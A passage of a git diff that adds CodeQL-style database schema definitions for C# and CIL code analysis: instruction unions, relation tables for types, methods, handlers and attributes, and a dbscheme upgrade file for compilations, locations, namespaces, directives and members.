+@cil_field_access = @cil_ldfld_any | @cil_stfld_any; + +@cil_access = @cil_read_access | @cil_write_access; + +// CIL constant/literal instructions + +@cil_ldc_i = @cil_ldc_i4_any | @cil_ldc_i8; + +@cil_ldc_i4_any = @cil_ldc_i4_m1 | @cil_ldc_i4_0 | @cil_ldc_i4_1 | @cil_ldc_i4_2 | @cil_ldc_i4_3 | + @cil_ldc_i4_4 | @cil_ldc_i4_5 | @cil_ldc_i4_6 | @cil_ldc_i4_7 | @cil_ldc_i4_8 | @cil_ldc_i4_s | @cil_ldc_i4; + +@cil_ldc_r = @cil_ldc_r4 | @cil_ldc_r8; + +@cil_literal = @cil_ldnull | @cil_ldc_i | @cil_ldc_r | @cil_ldstr; + +// Control flow + +@cil_conditional_jump = @cil_binary_jump | @cil_unary_jump; +@cil_binary_jump = @cil_beq_s | @cil_bge_s | @cil_bgt_s | @cil_ble_s | @cil_blt_s | + @cil_bne_un_s | @cil_bge_un_s | @cil_bgt_un_s | @cil_ble_un_s | @cil_blt_un_s | + @cil_beq | @cil_bge | @cil_bgt | @cil_ble | @cil_blt | + @cil_bne_un | @cil_bge_un | @cil_bgt_un | @cil_ble_un | @cil_blt_un; +@cil_unary_jump = @cil_brfalse_s | @cil_brtrue_s | @cil_brfalse | @cil_brtrue | @cil_switch; +@cil_unconditional_jump = @cil_br | @cil_br_s | @cil_leave_any; +@cil_leave_any = @cil_leave | @cil_leave_s; +@cil_jump = @cil_unconditional_jump | @cil_conditional_jump; + +// CIL call instructions + +@cil_call_any = @cil_jmp | @cil_call | @cil_calli | @cil_tail | @cil_callvirt | @cil_newobj; + +// CIL expression instructions + +@cil_expr = @cil_literal | @cil_binary_expr | @cil_unary_expr | @cil_call_any | @cil_read_access | + @cil_newarr | @cil_ldtoken | @cil_sizeof | + @cil_ldftn | @cil_ldvirtftn | @cil_localloc | @cil_mkrefany | @cil_refanytype | @cil_arglist | @cil_dup; + +@cil_unary_expr = + @cil_conversion_operation | @cil_unary_arithmetic_operation | @cil_unary_bitwise_operation| + @cil_ldlen | @cil_isinst | @cil_box | @cil_ldobj | @cil_castclass | @cil_unbox_any | + @cil_ldind | @cil_unbox; + +@cil_conversion_operation = + @cil_conv_i1 | @cil_conv_i2 | @cil_conv_i4 | @cil_conv_i8 | + @cil_conv_u1 | @cil_conv_u2 | @cil_conv_u4 | @cil_conv_u8 | + @cil_conv_ovf_i | @cil_conv_ovf_i_un | @cil_conv_ovf_i1 | @cil_conv_ovf_i1_un | + @cil_conv_ovf_i2 | @cil_conv_ovf_i2_un | @cil_conv_ovf_i4 | @cil_conv_ovf_i4_un | + @cil_conv_ovf_i8 | @cil_conv_ovf_i8_un | @cil_conv_ovf_u | @cil_conv_ovf_u_un | + @cil_conv_ovf_u1 | @cil_conv_ovf_u1_un | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_ovf_u4 | @cil_conv_ovf_u4_un | @cil_conv_ovf_u8 | @cil_conv_ovf_u8_un | + @cil_conv_r4 | @cil_conv_r8 | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_i | @cil_conv_u | @cil_conv_r_un; + +@cil_ldind = @cil_ldind_i | @cil_ldind_i1 | @cil_ldind_i2 | @cil_ldind_i4 | @cil_ldind_i8 | + @cil_ldind_r4 | @cil_ldind_r8 | @cil_ldind_ref | @cil_ldind_u1 | @cil_ldind_u2 | @cil_ldind_u4; + +@cil_stind = @cil_stind_i | @cil_stind_i1 | @cil_stind_i2 | @cil_stind_i4 | @cil_stind_i8 | + @cil_stind_r4 | @cil_stind_r8 | @cil_stind_ref; + +@cil_bitwise_operation = @cil_binary_bitwise_operation | @cil_unary_bitwise_operation; + +@cil_binary_bitwise_operation = @cil_and | @cil_or | @cil_xor | @cil_shr | @cil_shr | @cil_shr_un | @cil_shl; + +@cil_binary_arithmetic_operation = @cil_add | @cil_sub | @cil_mul | @cil_div | @cil_div_un | + @cil_rem | @cil_rem_un | @cil_add_ovf | @cil_add_ovf_un | @cil_mul_ovf | @cil_mul_ovf_un | + @cil_sub_ovf | @cil_sub_ovf_un; + +@cil_unary_bitwise_operation = @cil_not; + +@cil_binary_expr = @cil_binary_arithmetic_operation | @cil_binary_bitwise_operation | @cil_read_array | @cil_comparison_operation; + +@cil_unary_arithmetic_operation = @cil_neg; + +@cil_comparison_operation = @cil_cgt_un | @cil_ceq | @cil_cgt | @cil_clt | @cil_clt_un; + +// Elements that retrieve an address of something +@cil_read_ref = @cil_ldloca_s | @cil_ldarga_s | @cil_ldflda | @cil_ldsflda | @cil_ldelema; + +// CIL array instructions + +@cil_read_array = + @cil_ldelem | @cil_ldelema | @cil_ldelem_i1 | @cil_ldelem_ref | @cil_ldelem_i | + @cil_ldelem_i1 | @cil_ldelem_i2 | @cil_ldelem_i4 | @cil_ldelem_i8 | @cil_ldelem_r4 | + @cil_ldelem_r8 | @cil_ldelem_u1 | @cil_ldelem_u2 | @cil_ldelem_u4; + +@cil_write_array = @cil_stelem | @cil_stelem_ref | + @cil_stelem_i | @cil_stelem_i1 | @cil_stelem_i2 | @cil_stelem_i4 | @cil_stelem_i8 | + @cil_stelem_r4 | @cil_stelem_r8; + +@cil_throw_any = @cil_throw | @cil_rethrow; + +#keyset[impl, index] +cil_instruction( + unique int id: @cil_instruction, + int opcode: int ref, + int index: int ref, + int impl: @cil_method_implementation ref); + +cil_jump( + unique int instruction: @cil_jump ref, + int target: @cil_instruction ref); + +cil_access( + unique int instruction: @cil_instruction ref, + int target: @cil_accessible ref); + +cil_value( + unique int instruction: @cil_literal ref, + string value: string ref); + +#keyset[instruction, index] +cil_switch( + int instruction: @cil_switch ref, + int index: int ref, + int target: @cil_instruction ref); + +cil_instruction_location( + unique int id: @cil_instruction ref, + int loc: @location ref); + +cil_type_location( + int id: @cil_type ref, + int loc: @location ref); + +cil_method_location( + int id: @cil_method ref, + int loc: @location ref); + +@cil_namespace = @namespace; + +@cil_type_container = @cil_type | @cil_namespace | @cil_method; + +case @cil_type.kind of + 0 = @cil_valueorreftype +| 1 = @cil_typeparameter +| 2 = @cil_array_type +| 3 = @cil_pointer_type +| 4 = @cil_function_pointer_type +; + +cil_type( + unique int id: @cil_type, + string name: string ref, + int kind: int ref, + int parent: @cil_type_container ref, + int sourceDecl: @cil_type ref); + +cil_pointer_type( + unique int id: @cil_pointer_type ref, + int pointee: @cil_type ref); + +cil_array_type( + unique int id: @cil_array_type ref, + int element_type: @cil_type ref, + int rank: int ref); + +cil_function_pointer_return_type( + unique int id: @cil_function_pointer_type ref, + int return_type: @cil_type ref); + +cil_method( + unique int id: @cil_method, + string name: string ref, + int parent: @cil_type ref, + int return_type: @cil_type ref); + +cil_method_source_declaration( + unique int method: @cil_method ref, + int source: @cil_method ref); + +cil_method_implementation( + unique int id: @cil_method_implementation, + int method: @cil_method ref, + int location: @assembly ref); + +cil_implements( + int id: @cil_method ref, + int decl: @cil_method ref); + +#keyset[parent, name] +cil_field( + unique int id: @cil_field, + int parent: @cil_type ref, + string name: string ref, + int field_type: @cil_type ref); + +@cil_element = @cil_instruction | @cil_declaration | @cil_handler | @cil_attribute | @cil_namespace; +@cil_named_element = @cil_declaration | @cil_namespace; +@cil_declaration = @cil_variable | @cil_method | @cil_type | @cil_member; +@cil_accessible = @cil_declaration; +@cil_variable = @cil_field | @cil_stack_variable; +@cil_stack_variable = @cil_local_variable | @cil_parameter; +@cil_member = @cil_method | @cil_type | @cil_field | @cil_property | @cil_event; +@cil_custom_modifier_receiver = @cil_method | @cil_property | @cil_parameter | @cil_field | @cil_function_pointer_type; +@cil_parameterizable = @cil_method | @cil_function_pointer_type; +@cil_has_type_annotation = @cil_stack_variable | @cil_property | @cil_method | @cil_function_pointer_type; + +#keyset[parameterizable, index] +cil_parameter( + unique int id: @cil_parameter, + int parameterizable: @cil_parameterizable ref, + int index: int ref, + int param_type: @cil_type ref); + +cil_parameter_in(unique int id: @cil_parameter ref); +cil_parameter_out(unique int id: @cil_parameter ref); + +cil_setter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +#keyset[id, modifier] +cil_custom_modifiers( + int id: @cil_custom_modifier_receiver ref, + int modifier: @cil_type ref, + int kind: int ref); // modreq: 1, modopt: 0 + +cil_type_annotation( + int id: @cil_has_type_annotation ref, + int annotation: int ref); + +cil_getter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +cil_adder(unique int event: @cil_event ref, + int method: @cil_method ref); + +cil_remover(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_raiser(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_property( + unique int id: @cil_property, + int parent: @cil_type ref, + string name: string ref, + int property_type: @cil_type ref); + +#keyset[parent, name] +cil_event(unique int id: @cil_event, + int parent: @cil_type ref, + string name: string ref, + int event_type: @cil_type ref); + +#keyset[impl, index] +cil_local_variable( + unique int id: @cil_local_variable, + int impl: @cil_method_implementation ref, + int index: int ref, + int var_type: @cil_type ref); + +cil_function_pointer_calling_conventions( + int id: @cil_function_pointer_type ref, + int kind: int ref); + +// CIL handlers (exception handlers etc). + +case @cil_handler.kind of + 0 = @cil_catch_handler +| 1 = @cil_filter_handler +| 2 = @cil_finally_handler +| 4 = @cil_fault_handler +; + +#keyset[impl, index] +cil_handler( + unique int id: @cil_handler, + int impl: @cil_method_implementation ref, + int index: int ref, + int kind: int ref, + int try_start: @cil_instruction ref, + int try_end: @cil_instruction ref, + int handler_start: @cil_instruction ref); + +cil_handler_filter( + unique int id: @cil_handler ref, + int filter_start: @cil_instruction ref); + +cil_handler_type( + unique int id: @cil_handler ref, + int catch_type: @cil_type ref); + +@cil_controlflow_node = @cil_entry_point | @cil_instruction; + +@cil_entry_point = @cil_method_implementation | @cil_handler; + +@cil_dataflow_node = @cil_instruction | @cil_variable | @cil_method; + +cil_method_stack_size( + unique int method: @cil_method_implementation ref, + int size: int ref); + +// CIL modifiers + +cil_public(int id: @cil_member ref); +cil_private(int id: @cil_member ref); +cil_protected(int id: @cil_member ref); +cil_internal(int id: @cil_member ref); +cil_static(int id: @cil_member ref); +cil_sealed(int id: @cil_member ref); +cil_virtual(int id: @cil_method ref); +cil_abstract(int id: @cil_member ref); +cil_class(int id: @cil_type ref); +cil_interface(int id: @cil_type ref); +cil_security(int id: @cil_member ref); +cil_requiresecobject(int id: @cil_method ref); +cil_specialname(int id: @cil_method ref); +cil_newslot(int id: @cil_method ref); + +cil_base_class(unique int id: @cil_type ref, int base: @cil_type ref); +cil_base_interface(int id: @cil_type ref, int base: @cil_type ref); +cil_enum_underlying_type(unique int id: @cil_type ref, int underlying: @cil_type ref); + +#keyset[unbound, index] +cil_type_parameter( + int unbound: @cil_member ref, + int index: int ref, + int param: @cil_typeparameter ref); + +#keyset[bound, index] +cil_type_argument( + int bound: @cil_member ref, + int index: int ref, + int t: @cil_type ref); + +// CIL type parameter constraints + +cil_typeparam_covariant(int tp: @cil_typeparameter ref); +cil_typeparam_contravariant(int tp: @cil_typeparameter ref); +cil_typeparam_class(int tp: @cil_typeparameter ref); +cil_typeparam_struct(int tp: @cil_typeparameter ref); +cil_typeparam_new(int tp: @cil_typeparameter ref); +cil_typeparam_constraint(int tp: @cil_typeparameter ref, int supertype: @cil_type ref); + +// CIL attributes + +cil_attribute( + unique int attributeid: @cil_attribute, + int element: @cil_declaration ref, + int constructor: @cil_method ref); + +#keyset[attribute_id, param] +cil_attribute_named_argument( + int attribute_id: @cil_attribute ref, + string param: string ref, + string value: string ref); + +#keyset[attribute_id, index] +cil_attribute_positional_argument( + int attribute_id: @cil_attribute ref, + int index: int ref, + string value: string ref); + + +// Common .Net data model covering both C# and CIL + +// Common elements +@dotnet_element = @element | @cil_element; +@dotnet_named_element = @named_element | @cil_named_element; +@dotnet_callable = @callable | @cil_method; +@dotnet_variable = @variable | @cil_variable; +@dotnet_field = @field | @cil_field; +@dotnet_parameter = @parameter | @cil_parameter; +@dotnet_declaration = @declaration | @cil_declaration; +@dotnet_member = @member | @cil_member; +@dotnet_event = @event | @cil_event; +@dotnet_property = @property | @cil_property | @indexer; +@dotnet_parameterizable = @parameterizable | @cil_parameterizable; + +// Common types +@dotnet_type = @type | @cil_type; +@dotnet_call = @call | @cil_call_any; +@dotnet_throw = @throw_element | @cil_throw_any; +@dotnet_valueorreftype = @cil_valueorreftype | @value_or_ref_type | @cil_array_type | @void_type; +@dotnet_typeparameter = @type_parameter | @cil_typeparameter; +@dotnet_array_type = @array_type | @cil_array_type; +@dotnet_pointer_type = @pointer_type | @cil_pointer_type; +@dotnet_type_parameter = @type_parameter | @cil_typeparameter; +@dotnet_generic = @dotnet_valueorreftype | @dotnet_callable; + +// Attributes +@dotnet_attribute = @attribute | @cil_attribute; + +// Expressions +@dotnet_expr = @expr | @cil_expr; + +// Literals +@dotnet_literal = @literal_expr | @cil_literal; +@dotnet_string_literal = @string_literal_expr | @cil_ldstr; +@dotnet_int_literal = @integer_literal_expr | @cil_ldc_i; +@dotnet_float_literal = @float_literal_expr | @cil_ldc_r; +@dotnet_null_literal = @null_literal_expr | @cil_ldnull; + +@metadata_entity = @cil_method | @cil_type | @cil_field | @cil_property | @field | @property | + @callable | @value_or_ref_type | @void_type; + +#keyset[entity, location] +metadata_handle(int entity : @metadata_entity ref, int location: @assembly ref, int handle: int ref) diff --git a/csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/semmlecode.csharp.dbscheme b/csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/semmlecode.csharp.dbscheme new file mode 100644 index 00000000000..d0fba103f7d --- /dev/null +++ b/csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/semmlecode.csharp.dbscheme @@ -0,0 +1,2069 @@ +/* This is a dummy line to alter the dbscheme, so we can make a database upgrade + * without actually changing any of the dbscheme predicates. It contains a date + * to allow for such updates in the future as well. + * + * 2021-07-14 + * + * DO NOT remove this comment carelessly, since it can revert the dbscheme back to a + * previously seen state (matching a previously seen SHA), which would make the upgrade + * mechanism not work properly. + */ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * csc f1.cs f2.cs f3.cs + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | --compiler + * 1 | *path to compiler* + * 2 | f1.cs + * 3 | f2.cs + * 4 | f3.cs + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The source files that are compiled by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.cs + * 1 | f2.cs + * 2 | f3.cs + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The references used by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs /r:ref1.dll /r:ref2.dll /r:ref3.dll + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | ref1.dll + * 1 | ref2.dll + * 2 | ref3.dll + */ +#keyset[id, num] +compilation_referencing_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + unique int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +extractor_messages( + unique int id: @extractor_message, + int severity: int ref, + string origin : string ref, + string text : string ref, + string entity : string ref, + int location: @location_default ref, + string stack_trace : string ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +compilation_assembly( + unique int id : @compilation ref, + int assembly: @assembly ref +) + +// Populated by the CSV extractor +externalData( + int id: @externalDataElement, + string path: string ref, + int column: int ref, + string value: string ref); + +sourceLocationPrefix( + string prefix: string ref); + +/* + * C# dbscheme + */ + +/** ELEMENTS **/ + +@element = @declaration | @stmt | @expr | @modifier | @attribute | @namespace_declaration + | @using_directive | @type_parameter_constraints | @externalDataElement + | @xmllocatable | @asp_element | @namespace | @preprocessor_directive; + +@declaration = @callable | @generic | @assignable | @namespace; + +@named_element = @namespace | @declaration; + +@declaration_with_accessors = @property | @indexer | @event; + +@assignable = @variable | @assignable_with_accessors | @event; + +@assignable_with_accessors = @property | @indexer; + +@attributable = @assembly | @field | @parameter | @operator | @method | @constructor + | @destructor | @callable_accessor | @value_or_ref_type | @declaration_with_accessors + | @local_function | @lambda_expr; + +/** LOCATIONS, ASEMMBLIES, MODULES, FILES and FOLDERS **/ + +@location = @location_default | @assembly; + +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +locations_mapped( + unique int id: @location_default ref, + int mapped_to: @location_default ref); + +@sourceline = @file | @callable | @xmllocatable; + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref); + +assemblies( + unique int id: @assembly, + int file: @file ref, + string fullname: string ref, + string name: string ref, + string version: string ref); + +files( + unique int id: @file, + string name: string ref); + +folders( + unique int id: @folder, + string name: string ref); + +@container = @folder | @file ; + +containerparent( + int parent: @container ref, + unique int child: @container ref); + +file_extraction_mode( + unique int file: @file ref, + int mode: int ref + /* 0 = normal, 1 = standalone extractor */ + ); + +/** NAMESPACES **/ + +@type_container = @namespace | @type; + +namespaces( + unique int id: @namespace, + string name: string ref); + +namespace_declarations( + unique int id: @namespace_declaration, + int namespace_id: @namespace ref); + +namespace_declaration_location( + unique int id: @namespace_declaration ref, + int loc: @location ref); + +parent_namespace( + unique int child_id: @type_container ref, + int namespace_id: @namespace ref); + +@declaration_or_directive = @namespace_declaration | @type | @using_directive; + +parent_namespace_declaration( + int child_id: @declaration_or_directive ref, // cannot be unique because of partial classes + int namespace_id: @namespace_declaration ref); + +@using_directive = @using_namespace_directive | @using_static_directive; + +using_global( + unique int id: @using_directive ref +); + +using_namespace_directives( + unique int id: @using_namespace_directive, + int namespace_id: @namespace ref); + +using_static_directives( + unique int id: @using_static_directive, + int type_id: @type_or_ref ref); + +using_directive_location( + unique int id: @using_directive ref, + int loc: @location ref); + +@preprocessor_directive = @pragma_warning | @pragma_checksum | @directive_define | @directive_undefine | @directive_warning + | @directive_error | @directive_nullable | @directive_line | @directive_region | @directive_endregion | @directive_if + | @directive_elif | @directive_else | @directive_endif; + +@conditional_directive = @directive_if | @directive_elif; +@branch_directive = @directive_if | @directive_elif | @directive_else; + +directive_ifs( + unique int id: @directive_if, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref); /* 0: false, 1: true */ + +directive_elifs( + unique int id: @directive_elif, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +directive_elses( + unique int id: @directive_else, + int branchTaken: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +#keyset[id, start] +directive_endifs( + unique int id: @directive_endif, + unique int start: @directive_if ref); + +directive_define_symbols( + unique int id: @define_symbol_expr ref, + string name: string ref); + +directive_regions( + unique int id: @directive_region, + string name: string ref); + +#keyset[id, start] +directive_endregions( + unique int id: @directive_endregion, + unique int start: @directive_region ref); + +directive_lines( + unique int id: @directive_line, + int kind: int ref); /* 0: default, 1: hidden, 2: numeric, 3: span */ + +directive_line_value( + unique int id: @directive_line ref, + int line: int ref); + +directive_line_file( + unique int id: @directive_line ref, + int file: @file ref); + +directive_line_offset( + unique int id: @directive_line ref, + int offset: int ref); + +directive_line_span( + unique int id: @directive_line ref, + int startLine: int ref, + int startColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +directive_nullables( + unique int id: @directive_nullable, + int setting: int ref, /* 0: disable, 1: enable, 2: restore */ + int target: int ref); /* 0: none, 1: annotations, 2: warnings */ + +directive_warnings( + unique int id: @directive_warning, + string message: string ref); + +directive_errors( + unique int id: @directive_error, + string message: string ref); + +directive_undefines( + unique int id: @directive_undefine, + string name: string ref); + +directive_defines( + unique int id: @directive_define, + string name: string ref); + +pragma_checksums( + unique int id: @pragma_checksum, + int file: @file ref, + string guid: string ref, + string bytes: string ref); + +pragma_warnings( + unique int id: @pragma_warning, + int kind: int ref /* 0 = disable, 1 = restore */); + +#keyset[id, index] +pragma_warning_error_codes( + int id: @pragma_warning ref, + string errorCode: string ref, + int index: int ref); + +preprocessor_directive_location( + unique int id: @preprocessor_directive ref, + int loc: @location ref); + +preprocessor_directive_compilation( + unique int id: @preprocessor_directive ref, + int compilation: @compilation ref); + +preprocessor_directive_active( + unique int id: @preprocessor_directive ref, + int active: int ref); /* 0: false, 1: true */ + +/** TYPES **/ + +types( + unique int id: @type, + int kind: int ref, + string name: string ref); + +case @type.kind of + 1 = @bool_type +| 2 = @char_type +| 3 = @decimal_type +| 4 = @sbyte_type +| 5 = @short_type +| 6 = @int_type +| 7 = @long_type +| 8 = @byte_type +| 9 = @ushort_type +| 10 = @uint_type +| 11 = @ulong_type +| 12 = @float_type +| 13 = @double_type +| 14 = @enum_type +| 15 = @struct_type +| 17 = @class_type +| 19 = @interface_type +| 20 = @delegate_type +| 21 = @null_type +| 22 = @type_parameter +| 23 = @pointer_type +| 24 = @nullable_type +| 25 = @array_type +| 26 = @void_type +| 27 = @int_ptr_type +| 28 = @uint_ptr_type +| 29 = @dynamic_type +| 30 = @arglist_type +| 31 = @unknown_type +| 32 = @tuple_type +| 33 = @function_pointer_type + ; + +@simple_type = @bool_type | @char_type | @integral_type | @floating_point_type | @decimal_type; +@integral_type = @signed_integral_type | @unsigned_integral_type; +@signed_integral_type = @sbyte_type | @short_type | @int_type | @long_type; +@unsigned_integral_type = @byte_type | @ushort_type | @uint_type | @ulong_type; +@floating_point_type = @float_type | @double_type; +@value_type = @simple_type | @enum_type | @struct_type | @nullable_type | @int_ptr_type + | @uint_ptr_type | @tuple_type; +@ref_type = @class_type | @interface_type | @array_type | @delegate_type | @null_type + | @dynamic_type; +@value_or_ref_type = @value_type | @ref_type; + +typerefs( + unique int id: @typeref, + string name: string ref); + +typeref_type( + int id: @typeref ref, + unique int typeId: @type ref); + +@type_or_ref = @type | @typeref; + +array_element_type( + unique int array: @array_type ref, + int dimension: int ref, + int rank: int ref, + int element: @type_or_ref ref); + +nullable_underlying_type( + unique int nullable: @nullable_type ref, + int underlying: @type_or_ref ref); + +pointer_referent_type( + unique int pointer: @pointer_type ref, + int referent: @type_or_ref ref); + +enum_underlying_type( + unique int enum_id: @enum_type ref, + int underlying_type_id: @type_or_ref ref); + +delegate_return_type( + unique int delegate_id: @delegate_type ref, + int return_type_id: @type_or_ref ref); + +function_pointer_return_type( + unique int function_pointer_id: @function_pointer_type ref, + int return_type_id: @type_or_ref ref); + +extend( + int sub: @type ref, + int super: @type_or_ref ref); + +anonymous_types( + unique int id: @type ref); + +@interface_or_ref = @interface_type | @typeref; + +implement( + int sub: @type ref, + int super: @type_or_ref ref); + +type_location( + int id: @type ref, + int loc: @location ref); + +tuple_underlying_type( + unique int tuple: @tuple_type ref, + int struct: @type_or_ref ref); + +#keyset[tuple, index] +tuple_element( + int tuple: @tuple_type ref, + int index: int ref, + unique int field: @field ref); + +attributes( + unique int id: @attribute, + int kind: int ref, + int type_id: @type_or_ref ref, + int target: @attributable ref); + +case @attribute.kind of + 0 = @attribute_default +| 1 = @attribute_return +| 2 = @attribute_assembly +| 3 = @attribute_module +; + +attribute_location( + int id: @attribute ref, + int loc: @location ref); + +@type_mention_parent = @element | @type_mention; + +type_mention( + unique int id: @type_mention, + int type_id: @type_or_ref ref, + int parent: @type_mention_parent ref); + +type_mention_location( + unique int id: @type_mention ref, + int loc: @location ref); + +@has_type_annotation = @assignable | @type_parameter | @callable | @expr | @delegate_type | @generic | @function_pointer_type; + +/** + * A direct annotation on an entity, for example `string? x;`. + * + * Annotations: + * 2 = reftype is not annotated "!" + * 3 = reftype is annotated "?" + * 4 = readonly ref type / in parameter + * 5 = ref type parameter, return or local variable + * 6 = out parameter + * + * Note that the annotation depends on the element it annotates. + * @assignable: The annotation is on the type of the assignable, for example the variable type. + * @type_parameter: The annotation is on the reftype constraint + * @callable: The annotation is on the return type + * @array_type: The annotation is on the element type + */ +type_annotation(int id: @has_type_annotation ref, int annotation: int ref); + +nullability(unique int nullability: @nullability, int kind: int ref); + +case @nullability.kind of + 0 = @oblivious +| 1 = @not_annotated +| 2 = @annotated +; + +#keyset[parent, index] +nullability_parent(int nullability: @nullability ref, int index: int ref, int parent: @nullability ref) + +type_nullability(int id: @has_type_annotation ref, int nullability: @nullability ref); + +/** + * The nullable flow state of an expression, as determined by Roslyn. + * 0 = none (default, not populated) + * 1 = not null + * 2 = maybe null + */ +expr_flowstate(unique int id: @expr ref, int state: int ref); + +/** GENERICS **/ + +@generic = @type | @method | @local_function; + +type_parameters( + unique int id: @type_parameter ref, + int index: int ref, + int generic_id: @generic ref, + int variance: int ref /* none = 0, out = 1, in = 2 */); + +#keyset[constructed_id, index] +type_arguments( + int id: @type_or_ref ref, + int index: int ref, + int constructed_id: @generic_or_ref ref); + +@generic_or_ref = @generic | @typeref; + +constructed_generic( + unique int constructed: @generic ref, + int generic: @generic_or_ref ref); + +type_parameter_constraints( + unique int id: @type_parameter_constraints, + int param_id: @type_parameter ref); + +type_parameter_constraints_location( + int id: @type_parameter_constraints ref, + int loc: @location ref); + +general_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int kind: int ref /* class = 1, struct = 2, new = 3 */); + +specific_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref); + +specific_type_parameter_nullability( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref, + int nullability: @nullability ref); + +/** FUNCTION POINTERS */ + +function_pointer_calling_conventions( + int id: @function_pointer_type ref, + int kind: int ref); + +#keyset[id, index] +has_unmanaged_calling_conventions( + int id: @function_pointer_type ref, + int index: int ref, + int conv_id: @type_or_ref ref); + +/** MODIFIERS */ + +@modifiable = @modifiable_direct | @event_accessor; + +@modifiable_direct = @member | @accessor | @local_function | @anonymous_function_expr; + +modifiers( + unique int id: @modifier, + string name: string ref); + +has_modifiers( + int id: @modifiable_direct ref, + int mod_id: @modifier ref); + +compiler_generated(unique int id: @modifiable ref); + +/** MEMBERS **/ + +@member = @method | @constructor | @destructor | @field | @property | @event | @operator | @indexer | @type; + +@named_exprorstmt = @goto_stmt | @labeled_stmt | @expr; + +@virtualizable = @method | @property | @indexer | @event; + +exprorstmt_name( + unique int parent_id: @named_exprorstmt ref, + string name: string ref); + +nested_types( + unique int id: @type ref, + int declaring_type_id: @type ref, + int unbound_id: @type ref); + +properties( + unique int id: @property, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @property ref); + +property_location( + int id: @property ref, + int loc: @location ref); + +indexers( + unique int id: @indexer, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @indexer ref); + +indexer_location( + int id: @indexer ref, + int loc: @location ref); + +accessors( + unique int id: @accessor, + int kind: int ref, + string name: string ref, + int declaring_member_id: @member ref, + int unbound_id: @accessor ref); + +case @accessor.kind of + 1 = @getter +| 2 = @setter + ; + +init_only_accessors( + unique int id: @accessor ref); + +accessor_location( + int id: @accessor ref, + int loc: @location ref); + +events( + unique int id: @event, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @event ref); + +event_location( + int id: @event ref, + int loc: @location ref); + +event_accessors( + unique int id: @event_accessor, + int kind: int ref, + string name: string ref, + int declaring_event_id: @event ref, + int unbound_id: @event_accessor ref); + +case @event_accessor.kind of + 1 = @add_event_accessor +| 2 = @remove_event_accessor + ; + +event_accessor_location( + int id: @event_accessor ref, + int loc: @location ref); + +operators( + unique int id: @operator, + string name: string ref, + string symbol: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @operator ref); + +operator_location( + int id: @operator ref, + int loc: @location ref); + +constant_value( + int id: @variable ref, + string value: string ref); + +/** CALLABLES **/ + +@callable = @method | @constructor | @destructor | @operator | @callable_accessor | @anonymous_function_expr | @local_function; + +@callable_accessor = @accessor | @event_accessor; + +methods( + unique int id: @method, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int 